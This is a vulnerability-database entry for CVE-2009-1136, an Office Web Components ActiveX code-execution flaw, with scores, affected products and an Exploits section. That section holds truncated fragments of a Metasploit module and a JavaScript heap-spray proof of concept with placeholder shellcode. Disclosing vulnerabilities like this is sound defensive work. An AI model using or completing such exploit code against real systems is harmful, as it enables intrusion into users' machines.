9.3
CVSSv2

CVE-2009-1136

Published: 15/07/2009 Updated: 12/10/2018
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 940
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Microsoft Office Web Components Spreadsheet ActiveX control (aka OWC10 or OWC11), as distributed in Office XP SP3 and Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 Gold and SP1, and Office Small Business Accounting 2006, when used in Internet Explorer, allows remote malicious users to execute arbitrary code via a crafted call to the msDataSourceObject method, as exploited in the wild in July and August 2009, aka "Office Web Components HTML Script Vulnerability."

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft office 2003

microsoft isa server 2004

microsoft office web components xp

microsoft isa server 2006

microsoft office web components 2003

microsoft office xp sp3

Exploits

## # $Id: ms09_043_owc_msdsorb 9893 2010-07-20 23:28:47Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' cl ...
<!-- ensecuritylabru/poc/extra/382458php --> <html> <body> <script language="JavaScript"> var shellcode = unescape("evil code"); var array = new Array(); var ls = 0x81000-(shellcodelength*2); var bigblock = unescape("%u0b0c%u0b0C"); while(bigblocklength<ls/2) {bigblock+=bigblock;} var lh = bigblocksubstring(0 ...